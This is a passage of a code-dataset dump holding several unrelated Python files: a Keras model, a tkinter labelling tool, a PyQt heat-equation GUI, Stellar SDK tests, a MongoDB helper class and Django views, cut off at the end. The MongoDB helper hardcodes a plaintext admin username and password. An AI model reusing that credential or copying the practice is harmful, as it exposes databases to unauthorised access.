input_all[...,shape[-1]//2:]\n input_imgs = input_all[...,:shape[-1]//2]\n x = keras.layers.Conv2D(16, kernel_size=3, activation='relu', padding='same')(input_imgs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Conv2D(32, kernel_size=3, activation='relu', padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n\n y = keras.layers.Conv2D(32, kernel_size=3, activation='relu', padding='same')(input_imgs)\n y = keras.layers.BatchNormalization()(y)\n encoded = keras.layers.Add()([x,y])\n \n x = keras.layers.Conv2DTranspose(32, kernel_size=4, activation='relu', padding='same')(encoded)\n x = keras.layers.Conv2DTranspose(16, kernel_size=4, activation='relu', padding='same')(x)\n \n #weights\n decoded_img = keras.layers.Conv2D(shape[2] // 2, kernel_size=3, activation='linear', padding='same')(x)\n decoded_all = tf.concat([decoded_img, weights], axis = -1)\n \n #no weights\n #decoded_all = keras.layers.Conv2D(shape[2], kernel_size=3,activation='relu', padding = 'same')(x) \n \n return keras.Model(input_all, decoded_all)\n\n\nbands = 1\ndef masked_MSE_with_uncertainty(y_true, y_pred): \n weights = y_pred[...,bands:] \n y_pred_image = y_pred[...,:bands]\n \n return K.square(tf.math.multiply((y_true - y_pred_image), weights) )\n #return K.square(tf.math.multiply((y_true - y_pred), 1) ) #no weights\n #return tf.abs(K.square(tf.math.multiply((y_true - y_pred_image), weights) ) - b) + b #weights","sub_path":"Code/Batch Loading/Currently used/job_scripts/func_job3.py","file_name":"func_job3.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"38974609","text":"\"\"\"\nLoads the data from the data directory, and plots it in a canvas for eazy labeling\n\"\"\"\nimport tkinter as tk\nimport json\n\n# Tkinter class\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.createWidgets()\n self.loadelements()\n\n def createWidgets(self):\n self.panelframe = tk.Frame(self, width=1500, height=600)\n self.panel = tk.Canvas(self.panelframe, width=1500, height=600, scrollregion=(0,0,100000,5000))\n\n self.hbar = tk.Scrollbar(self.panelframe, orient=tk.HORIZONTAL)\n self.hbar.pack(side='bottom', fill='x')\n self.hbar.config(command=self.panel.xview)\n\n self.vbar = tk.Scrollbar(self.panelframe, orient=tk.VERTICAL)\n self.vbar.pack(side='right', fill='y')\n self.vbar.config(command=self.panel.yview)\n\n self.panel.config(xscrollcommand=self.hbar.set, yscrollcommand=self.vbar.set)\n self.panel.pack()\n\n self.panelframe.pack()\n\n def loadelements(self):\n with open('../data/unlabelled/www.rtvdrenthe.nl.json', 'r') as infile:\n self.elements = json.loads(infile.read())\n self.drawElements(self.elements)\n\n def drawElements(self, elements):\n for element in elements:\n bounds = element['bounds']\n top = (bounds['top'])\n left = (bounds['left'])\n endtop = (top + bounds['height'])\n endleft = (left + bounds['width'])\n self.panel.create_rectangle(left, top, endleft, endtop, fill=\"blue\")\n self.panel.create_text(left, top, anchor=\"nw\",text=element['info']['tag'])\n self.panel.create_text(left, top, anchor=\"nw\",text=element['info']['text'])\n\nif __name__ == \"__main__\":\n print('hello world')\n root = tk.Tk()\n app = Application(master=root)\n app.mainloop()\n","sub_path":"src/displaydata.py","file_name":"displaydata.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"211184370","text":"# Created by Shlyankin Nickolay\nfrom PyQt5 import QtWidgets\nfrom mydesign import Ui_MainWindow\nfrom util import Task\nimport pyqtgraph as pg\nimport sys\n\nclass mywindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(mywindow, self).__init__()\n self.task = None\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.graphWidget = pg.PlotWidget()\n self.ui.layoutGraph.addWidget(self.graphWidget)\n self.graphWidget.setBackground('w')\n self.graphWidget.setLabel('left', 'Температура (К)', color='red', size=30)\n self.graphWidget.setLabel('bottom', 'Радиус (см)', color='red', size=30)\n self.ui.sliderImage.valueChanged.connect(self.plotNextGraph)\n self.ui.buttonCaluclate.clicked.connect(self.calculate)\n self.ui.buttonClear.clicked.connect(self.clear)\n self.l = pg.LegendItem((160,60), offset=(430,10))\n self.l.setParentItem(self.graphWidget.graphicsItem())\n\n\n def clear(self):\n self.ui.edit_R.setText(\"\")\n self.ui.edit_l.setText(\"\")\n self.ui.edit_k.setText(\"\")\n self.ui.edit_c.setText(\"\")\n self.ui.edit_T.setText(\"\")\n self.ui.edit_Uc.setText(\"\")\n self.ui.edit_alpha.setText(\"\")\n self.ui.edit_K.setText(\"\")\n self.ui.edit_I.setText(\"\")\n self.graphWidget.clear()\n self.task = None\n self.ui.label_gridInfo.setStyleSheet(\"color: rgb(0, 0, 0);\")\n self.ui.label_gridInfo.setText(\"\")\n self.ui.label_max_t.setText(\"0\")\n self.ui.sliderImage.setMaximum(0)\n self.ui.label_current_time.setText(\"Индекс времени k = \")\n self.ui.label_current_time_2.setText(\"Время t = \")\n\n def legend_del(self):\n while(len(self.l.items)):\n item, label = self.l.items[0]\n self.l.items.remove((item, label)) # удалить линию\n self.l.layout.removeItem(item)\n item.close()\n self.l.layout.removeItem(label) # удалить надпись\n label.close()\n self.l.updateSize()\n\n def calculate(self):\n self.ui.label_gridInfo.setStyleSheet(\"color: rgb(0, 0, 0);\")\n self.ui.label_gridInfo.setText(\"\")\n try:\n R = float(self.ui.edit_R.text())\n l = float(self.ui.edit_l.text())\n k = float(self.ui.edit_k.text())\n c = float(self.ui.edit_c.text())\n T = float(self.ui.edit_T.text())\n Uc = float(self.ui.edit_Uc.text())\n alpha = float(self.ui.edit_alpha.text())\n K = int( self.ui.edit_K.text())\n I = int( self.ui.edit_I.text())\n self.ui.label_gridInfo.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.label_gridInfo.setText(\"Идут вычисления. Подождите.\")\n self.task = Task(R, l, k, c, alpha, T, Uc, K, I)\n answer = self.task.calculate()\n answer_analytic = self.task.analytic_decision()\n self.ui.label_gridInfo.setText(\"Готово!\")\n y = answer[0]\n x = self.task.r\n self.ui.sliderImage.setValue(0)\n self.ui.label_max_t.setText(str(len(answer) - 1))\n self.ui.sliderImage.setMaximum(len(answer) - 1)\n self.graphWidget.clear()\n self.legend_del()\n self.ui.label_current_time.setText(\"Индекс времени k = \" + str(0))\n self.ui.label_current_time_2.setText(\"Время t = \" + str(0) + \" c\")\n self.plotGraph(x, answer_analytic[0], \"Аналитическое решение при t=0\", 'b')\n self.plotGraph(x, y, \"Кранка-Николсона при t=0\", 'r')\n self.ui.label_gridInfo.setText(self.ui.label_gridInfo.text() +\n \"\\nabsolute error: \" + str(self.task.calculateAbsError()) +\n \"\\nРешение устойчиво: \" + str(self.task.isStable()) +\n \"\\nhr = \" + str(self.task.hr) + \"\\tht = \" + str(self.task.ht)\n )\n\n except ValueError:\n self.ui.label_gridInfo.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.label_gridInfo.setText(\"Проверьте поля!\")\n\n def plotNextGraph(self):\n self.legend_del()\n t = self.ui.sliderImage.value()\n self.ui.label_current_time.setText(\"Индекс времени k = \" + str(t))\n self.ui.label_current_time_2.setText(\"Время t = \" + str(round(t*self.task.ht, 2)) + \" c\")\n if(self.task != None):\n y = self.task.answer[t]\n x = self.task.r\n self.graphWidget.clear()\n self.plotGraph(x, self.task.answer_analytic[t], \"Аналитическое решение при t=\"+str(round(t*self.task.ht, 1))+\" c\", 'b')\n self.plotGraph(x, y, \"Кранка-Николсона при t=\"+str(round(t*self.task.ht, 1))+\" c\", 'r')\n\n def plotGraph(self, x, y, plotname, color):\n self.graphWidget.showGrid(x=True, y=True)\n pen = pg.mkPen(color=color, width=3)\n self.l.addItem(self.graphWidget.plot(x, y, name=plotname, pen=pen), plotname)\n\n\n\napp = QtWidgets.QApplication([])\napplication = mywindow()\napplication.show()\n\nsys.exit(app.exec())\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"112009590","text":"import pytest\n\nfrom stellar_sdk import Asset\nfrom stellar_sdk.call_builder.call_builder_async import TradeAggregationsCallBuilder\nfrom stellar_sdk.exceptions import ValueError\nfrom tests.call_builder.call_builder_async import client, horizon_url\n\n\nclass TestTradeAggregationsCallBuilder:\n def test_init(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter = Asset.native()\n resolution = 300000\n builder = TradeAggregationsCallBuilder(\n horizon_url, client, base=base, counter=counter, resolution=resolution\n )\n assert builder.endpoint == \"trade_aggregations\"\n assert builder.params == {\n \"base_asset_type\": base.type,\n \"base_asset_code\": base.code,\n \"base_asset_issuer\": base.issuer,\n \"counter_asset_type\": counter.type,\n \"resolution\": str(resolution),\n }\n\n def test_invalid_resolution_raise(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter = Asset.native()\n resolution = 1000\n with pytest.raises(\n ValueError, match=\"Invalid resolution: {}\".format(resolution)\n ):\n TradeAggregationsCallBuilder(\n horizon_url, client, base=base, counter=counter, resolution=resolution\n )\n\n def test_invalid_offset_raise(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter = Asset.native()\n resolution = 300000\n offset = 600000\n with pytest.raises(ValueError, match=\"Invalid offset: {}\".format(offset)):\n TradeAggregationsCallBuilder(\n horizon_url,\n client,\n base=base,\n counter=counter,\n resolution=resolution,\n offset=offset,\n )\n","sub_path":"tests/call_builder/call_builder_async/test_trades_aggregation_call_builder.py","file_name":"test_trades_aggregation_call_builder.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433517266","text":"def bazz (num):\r\n if num%3 == 0 and num%5 != 0:\r\n print(\"bazz\")\r\n\r\n elif num%5 == 0 and num%3 !=0:\r\n print(\"buzz\")\r\n\r\n elif num%3 == 0 and num%5 == 0:\r\n print(\"bazzbuzz\")\r\n\r\nfor x in range (1, 100) :\r\n num = x\r\n print(x)\r\n bazz(num)\r\n","sub_path":"bazz.py","file_name":"bazz.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"587323002","text":"# coding:utf-8\n\n\"\"\"\nCreated on 2016年5月17日\n\n@author: shane\n\"\"\"\n\nimport logging\nfrom datetime import datetime\n\nfrom pymongo import MongoClient\nimport gridfs\n\nGRIDFS_ERROR_CORRUPTGRIDFILE = '[Gridfs Error CorruptGridFile]'\nGRIDFS_ERROR_NOFILE = '[Gridfs Error NoFile]'\nGRIDFS_ERROR_FILEEXISTS = '[Gridfs Error FileExists]'\nGRIDFS_ERROR_GRIDFSERROR = '[Gridfs Error GridFsError]'\nOTHER_EXCEPTION = 'other exception:'\n\nuser = 'superuser'\npassword = 'hgd77287987'\nauthorization_db = 'admin'\n\n\nclass MongoHandler:\n\t\"\"\"\n\t操作MongoClient的物件類別\n\t\"\"\"\n\n\tdef __init__(self, uri=None):\n\t\t\"\"\"\n\n\t\t:param ip:\n\t\t:param port:\n\t\t:param auth:\n\t\t\"\"\"\n\t\tself._logger = logging.getLogger('mongo')\n\t\tif uri is None:\n\t\t\tip = 'localhost'\n\t\t\tport = 27017\n\n\t\t# uri = 'mongodb://' + user + ':' + password + '@' + ip + ':' + str(port) + '/' + authorization_db\n\t\tself._client = MongoClient(uri)\n\n\t\tself._inserted = 0\n\t\tself._updated = 0\n\t\tself._ignored = 0\n\n\t\tself._logger.info('MongoHandler initialized')\n\n\tdef get_status(self):\n\t\t\"\"\"\n\t\t取得Mongo操作的統計資訊如:新增筆數、更新筆數、忽略筆數\n\t\t:return: \n\t\t\"\"\"\n\t\treturn {'inserted': self._inserted, 'updated': self._updated, 'ignored': self._ignored}\n\n\tdef insert_crawler_status(self, db_name, status_info):\n\t\tstatus_info['inserted'] = self._inserted\n\t\tstatus_info['updated'] = self._updated\n\t\tstatus_info['ignored'] = self._ignored\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db['CrawlerStatus']\n\t\tcollection.insert_one(status_info)\n\n\tdef count(self, db_name, collection_name, filter_dict):\n\t\t'''\n\t\t查詢資料筆數\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tfilter_dict: 篩選條件字典\n\n\t\tReturns:\n\t\t\t符合的資料筆數\n\t\t'''\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\treturn collection.count(filter_dict)\n\n\tdef find(self, db_name, collection_name, filter_dict, multi):\n\t\t'''\n\t\t查詢資料\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tfilter_dict: 篩選條件字典\n\t\t\tmulti: 查詢後是否取得多筆資料\n\n\t\tReturns:\n\t\t\t若multi=True則回傳資料字典陣列;否則僅回傳一筆\n\t\t'''\n\t\t# self._logger.debug('finding')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tif (multi):\n\t\t\treturn self.find_many(db_name, collection_name, filter_dict, None)\n\t\t# \t\t\tary = []\n\t\t# \t\t\tfor data in collection.find(filter_dict):\n\t\t# \t\t\t\tary.append(data)\n\t\t#\n\t\t# \t\t\treturn ary\n\t\telse:\n\t\t\treturn collection.find_one(filter_dict)\n\n\tdef find_many(self, db_name, collection_name, filter_dict, projection, page=1, limit=0):\n\t\t'''\n\t\t查詢資料\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tfilter_dict: 篩選條件字典\n\t\t\tprojection: 篩選要那些欄位是否要顯示\n\t\t\tpage: 從第幾頁開始\n\t\t\tlimit: 每頁筆數\n\n\t\tReturns:\n\t\t\t回傳資料字典陣列\n\t\t'''\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\tskip = page * limit\n\t\tcursor = collection.find(filter=filter_dict, skip=skip, limit=limit, no_cursor_timeout=True,\n\t\t projection=projection)\n\t\tary = list(cursor)\n\t\tcursor.close()\n\t\t# for data in collection.find(filter=filter_dict, skip=skip, limit=limit):\n\t\t# ary.append(data)\n\n\t\treturn ary\n\n\tdef find_object_id(self, db_name, collection_name, filter_dict):\n\t\t'''\n\t\t取得符合篩選條件的單筆資料之 ObjectId\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tfilter_dict: 篩選條件字典\n\n\t\tReturns:\n\t\t\t若有找到則回傳 _id 之 ObjectId,否則回傳 None\n\t\t'''\n\n\t\tdoc = self.find(db_name, collection_name, filter_dict, False)\n\t\tif doc != None:\n\t\t\treturn doc['_id']\n\t\telse:\n\t\t\treturn None\n\n\tdef delete(self, db_name, collection_name, filter_dict, multi):\n\t\t'''\n\t\t刪除資料\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tfilter_dict: 篩選條件字典\n\t\t\tmulti: 是否刪除多筆,True=刪除所有符合資料;否則僅刪除一筆\n\t\t'''\n\t\tself._logger.debug('deleting')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tif multi:\n\t\t\tcollection.delete_many(filter_dict)\n\t\telse:\n\t\t\tcollection.delete_one(filter_dict)\n\n\tdef insert_many(self, db_name, collection_name, records, identifiers):\n\t\t'''\n\t\t新增多筆資料,分為以下幾種行為:\n\t\t\t1. 若資料不存在則新增\n\t\t\t2. 若資料存在,且資料有異動,則更新\n\t\t\t3. 若資料存在但資料無異動,則忽略\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\trecord: 欲新增的資料字典\n\t\t\tidentifiers: 用來判定唯一值的欄位陣列,用以判別資料是否重複\n\t\t'''\n\t\tself._logger.debug('inserting many')\n\n\t\tfor record in records:\n\t\t\tself.insert_one(db_name, collection_name, record, identifiers)\n\n\tdef insert_many2(self, db_name, collection_name, records, identifiers):\n\t\t'''\n\t\t'''\n\t\tself._logger.debug('inserting many 2')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tfor record in records:\n\t\t\ttoday = datetime.today()\n\t\t\trecord['createTime'] = today\n\t\t\trecord['updateTime'] = today\n\n\t\tcollection.insert_many(records)\n\n\tdef insert_one(self, db_name, collection_name, record, identifiers):\n\t\t'''\n\t\t新增單筆資料,分為以下幾種行為:\n\t\t\t1. 若資料不存在則新增\n\t\t\t2. 若資料存在,且資料有異動,則更新\n\t\t\t3. 若資料存在但資料無異動,則忽略\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\trecord: 欲新增的資料字典\n\t\t\tidentifiers: 用來判定唯一值的欄位陣列,用以判別資料是否重複\n\t\t'''\n\t\t# self._logger.debug('inserting one')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\ttoday = datetime.today()\n\n\t\tfilter_dict = {}\n\t\tfor field in identifiers:\n\t\t\tfilter_dict[field] = record[field]\n\n\t\tdoc = self.find(db_name, collection_name, filter_dict, False)\n\t\tif doc is None:\n\t\t\trecord['createTime'] = today\n\t\t\trecord['updateTime'] = today\n\t\t\tcollection.insert_one(record)\n\t\t\tself._inserted += 1\n\t\telse:\n\t\t\tself._check_and_update(db_name, collection_name, doc, record)\n\n\tdef _check_and_update(self, db_name, collection_name, doc, record):\n\t\t'''\n\t\t檢查檔案,若欄位有修改過則更新,否則不處理\n\t\tPS. 僅針對抓取欄位判斷,其餘欄位接忽略,以免誤判後製欄位\n\n\t\tArgs:\n\t\t\tdb_name: DB名稱\n\t\t\tcollection_name: collection名稱\n\t\t\tdoc: 從DB取出的資料字典\n\t\t\trecord: 欲比較的資料字典\n\t\t'''\n\t\t# self._logger.debug('checking and updating')\n\n\t\tupdate_logs = []\n\t\tupdate_dict = {}\n\n\t\tfor key in record.keys():\n\t\t\tif key not in doc.keys() or doc[key] != record[key]:\n\t\t\t\told = None\n\t\t\t\tif key in doc.keys():\n\t\t\t\t\told = repr(doc[key])\n\t\t\t\tupdate_logs.append({'field': key, 'old': old, 'new': repr(record[key])})\n\t\t\t\tupdate_dict[key] = record[key]\n\n\t\tif len(update_dict) > 0:\n\t\t\t# self._logger.debug('update')\n\t\t\tdb = self._client[db_name]\n\t\t\tcollection = db[collection_name]\n\t\t\ttoday = datetime.today()\n\n\t\t\t# 更新資料\n\t\t\tupdate_dict['updateTime'] = today\n\t\t\tcollection.update_one({'_id': doc['_id']}, {'$set': update_dict})\n\t\t\tself._updated += 1\n\n\t\t# 更新狀態\n\t\t# log_dict = {'createTime': today, 'collection': collection_name, 'objId': doc['_id'], 'logs': update_logs}\n\t\t# log_collection = db['CrawlerLog']\n\t\t# log_collection.insert_one(log_dict)\n\t\telse:\n\t\t\t# self._logger.debug('Ignore')\n\t\t\tself._ignored += 1\n\n\tdef gridfs_upload_from_stream(self, db_name, grid_fs_bucket, filename, source, metadata):\n\t\t'''\n\t\treturn file id\n\t\t'''\n\t\tdb = self._client[db_name]\n\t\ttry:\n\t\t\tfsbk = gridfs.GridFSBucket(db, grid_fs_bucket)\n\t\t\tfiled_id = fsbk.upload_from_stream(filename, source, metadata=metadata)\n\t\t\treturn filed_id\n\t\texcept gridfs.errors.NoFile as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_CORRUPTGRIDFILE + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.FileExists as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_NOFILE + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.CorruptGridFile as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_FILEEXISTS + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.GridFSError as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_GRIDFSERROR + str(e))\n\t\t\treturn None\n\t\texcept Exception as e:\n\t\t\tself._logger.exception(OTHER_EXCEPTION + str(e))\n\t\t\treturn None\n\t\telse:\n\t\t\tpass\n\n\tdef distinct(self, db_name, collection_name, data_filter, key):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param key:\n\t\t:return:\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\treturn collection.distinct(key, data_filter)\n\n\tdef aggregate(self, db_name, collection_name, data_filter):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param key:\n\t\t:return:\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\treturn list(collection.aggregate(data_filter))\n\n\tdef data_check(self, db_name, collection_name, data_filter, multi, flag):\n\t\t\"\"\"\n\t\tthis method is check data exist\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param docs:\n\t\t:param multi:\n\t\t:param flag:\n\t\t:return: list or doc\n\t\t\"\"\"\n\t\tif flag == \"DEBUG\":\n\t\t\treturn self.find(db_name, collection_name, data_filter, multi)\n\n\tdef data_confirm(self, db_name, collection_name, docs, identifiers, flag):\n\t\t\"\"\"\n\t\tif someone want data confirm, if flag is DEBUG, data will insert to db for data confirm\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param docs:\n\t\t:param identifiers:\n\t\t:param flag:\n\t\t:return:\n\t\t\"\"\"\n\t\t# print(\"flag:\", flag)\n\t\tif flag == \"DEBUG\":\n\t\t\t# self._logger.debug(\"data confirm debug\")\n\t\t\tif type(docs) is list:\n\t\t\t\tfor doc in docs:\n\t\t\t\t\tself.insert_one(db_name, collection_name, doc, identifiers)\n\t\t\telse:\n\t\t\t\tself.insert_one(db_name, collection_name, docs, identifiers)\n\n\tdef get_cursor(self, db_name, collection_name, data_filter):\n\t\t\"\"\"\n\t\t*attention* the cursor that return is no timeout, so remember close this cursor\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:return: a pymongo cursor\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\treturn collection.find(data_filter, no_cursor_timeout=True)\n\n\tdef close_disconnect(self):\n\t\tself._client.close()\n\n\tdef project(self, db_name, collection_name, data_filter, projection):\n\t\t\"\"\"\n\t\t*attention* the cursor that return is no timeout, so remember close this cursor\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param projection:\n\t\t:return: cursor_list\n\t\t\"\"\"\n\t\tif db_name in self._client.database_names():\n\t\t\tdb = self._client[db_name]\n\t\telse:\n\t\t\treturn []\n\n\t\tif collection_name in db.collection_names():\n\t\t\tcollection = db[collection_name]\n\t\telse:\n\t\t\treturn []\n\t\tcursor = collection.find(filter=data_filter, projection=projection, no_cursor_timeout=True)\n\t\tcursor_list = list(cursor)\n\t\tcursor.close()\n\t\treturn cursor_list\n\n\tdef projection_one(self, db_name, collection_name, data_filter, projection):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param projection:\n\t\t:return:\n\t\t\"\"\"\n\t\tif db_name in self._client.database_names():\n\t\t\tdb = self._client[db_name]\n\t\telse:\n\t\t\treturn None\n\n\t\tif collection_name in db.collection_names():\n\t\t\tcollection = db[collection_name]\n\t\telse:\n\t\t\treturn None\n\n\t\tdoc = collection.find_one(filter=data_filter, projection=projection)\n\t\treturn doc\n\n\tdef collection_names(self, db_name=None):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self._client[db_name].collection_names()\n\n\tdef client(self):\n\t\treturn self._client\n","sub_path":"pmi/bigfour/Fresh/BitSpace/utility/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":11397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"564025963","text":"import os\n\nbaseDir = os.path.dirname(os.path.dirname(__file__))\n#print(baseDir,type(baseDir))\nexcelPath = baseDir+'/TestData/inter_test_data.xlsx'\n#print(excelPath)\napiExcelName='API'\n# 测试数据excel文件中,API表中列号数字映射\nAPI_apiName = 2\nAPI_requestUrl = 3\nAPI_requestMothod = 4\nAPI_paramsType = 5\nAPI_apiTestCaseFileName = 6\nAPI_active = 7\n\n# 测试数据excel文件中,API的测试用例表中的列号数字映射\nCASE_requestData = 1\nCASE_relyData = 2\nCASE_responseCode = 3\nCASE_responseData = 4\nCASE_dataStore = 5\nCASE_checkPoint = 6\nCASE_active = 7\nCASE_status = 8\nCASE_errorInfo = 9\n\n# 存储请参数里面依赖数据\nREQUEST_DATA = {}\n\n# 存储响应对象中的依赖数据\nRESPONSE_DATA = {}\n","sub_path":"config/public_data.py","file_name":"public_data.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8953091","text":"import os\nimport json\nimport time\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom json import encoder\nfrom django.http import HttpResponse, JsonResponse\nfrom stsimpy import STSimConsole\nfrom PIL import Image\nfrom OutputProcessing import texture_utils\n\n# Two decimal places when dumping to JSON\nencoder.FLOAT_REPR = lambda o: format(o, '.2f')\n\n# Declare the stsim console we want to work with\nstsim = STSimConsole(lib_path=settings.ST_SIM_WORKING_LIB,\n orig_lib_path=settings.ST_SIM_ORIG_LIB,\n exe=settings.ST_SIM_EXE)\n\n# TODO - need a way to initialize various stsim consoles\nspatial_stsim = STSimConsole(\n lib_path=os.path.join(settings.ST_SIM_WORKING_DIR, 'libraries', 'ST-Sim-Spatial-Sample-V2-4-6.ssim'),\n orig_lib_path=os.path.join(settings.ST_SIM_WORKING_DIR, 'libraries', 'ST-Sim-Spatial-Sample-V2-4-6_orig.ssim'),\n exe=settings.ST_SIM_EXE)\ndefault_run_control_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'run_control', 'run_ctrl.csv')\n\n# Defaults for this library. Run once and hold in memory.\ndefault_sid = stsim.list_scenarios()[0]\ndefault_sc_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'state_classes', 'state_classes.csv')\ndefault_transitions_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'probabilistic_transitions', 'original','prob_trans.csv')\nall_veg_state_classes = stsim.export_veg_state_classes(default_sid,\n state_class_path=default_sc_path)\nall_transition_types = stsim.export_probabilistic_transitions_types(default_sid,\n transitions_path=default_transitions_path)\n\n\nclass HomepageView(TemplateView):\n\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomepageView, self).get_context_data(**kwargs)\n\n # veg state classes\n context['veg_type_state_classes_json'] = json.dumps(all_veg_state_classes)\n\n # our probabilistic transition types for this application\n probabilistic_transition_types = [\"Replacement Fire\",\n \"Annual Grass Invasion\",\n \"Insect/Disease\",\n \"Native Grazing\",\n \"Excessive-Herbivory\"]\n\n if not all(value in all_transition_types for value in probabilistic_transition_types):\n raise KeyError(\"Invalid transition type specified for this library. Supplied values: \" +\n str([value for value in probabilistic_transition_types]))\n\n probabilistic_transition_dict = {value: 0 for value in probabilistic_transition_types}\n context['probabilistic_transitions_json'] = json.dumps(probabilistic_transition_dict)\n return context\n\n\nclass STSimSpatialStats(View):\n\n DATA_TYPES = ['veg', 'stateclass']\n\n def __init__(self):\n self.project_id = None\n self.data_type = None\n super().__init__()\n\n def dispatch(self, request, *args, **kwargs):\n self.project_id = kwargs.get('project_id')\n self.data_type = kwargs.get('data_type')\n\n if self.data_type not in self.DATA_TYPES:\n raise ValueError('Invalid data type')\n\n return super(STSimSpatialStats, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n data = dict()\n if self.data_type == 'veg':\n\n data = spatial_stsim.export_vegtype_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True)\n\n elif self.data_type == 'stateclass':\n\n data = spatial_stsim.export_stateclass_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True)\n return JsonResponse({\n 'data': {name: data[name]['ID'] for name in data.keys()}\n })\n\n\nclass STSimSpatialOutputs(View):\n\n DATA_TYPES = ['veg', 'stateclass']\n\n def __init__(self):\n\n self.scenario_id = None\n self.timestep = None\n self.data_type = None\n super(STSimSpatialOutputs, self).__init__()\n\n def dispatch(self, request, *args, **kwargs):\n self.scenario_id = kwargs.get('scenario_id')\n self.data_type = kwargs.get('data_type')\n self.timestep = kwargs.get('timestep')\n\n if self.data_type not in self.DATA_TYPES:\n raise ValueError(self.data_type + ' is not a valid data type. Types are \"veg\" or \"stateclass\".')\n\n return super(STSimSpatialOutputs, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n # TODO - construct a path to the actual directory serving the output tifs from STSim\n image_directory = os.path.join(settings.ST_SIM_WORKING_DIR, 'initial_conditions', 'spatial')\n if self.data_type == 'veg':\n image_path = os.path.join(image_directory, 'veg.png') # TODO - replace with the selected area of interest\n elif self.timestep == 0 or self.timestep == '0':\n image_path = os.path.join(image_directory, 'stateclass_0.png') # TODO - ^^\n else:\n image_path = os.path.join(spatial_stsim.lib + '.output', 'Scenario-'+str(self.scenario_id),\n 'Spatial', 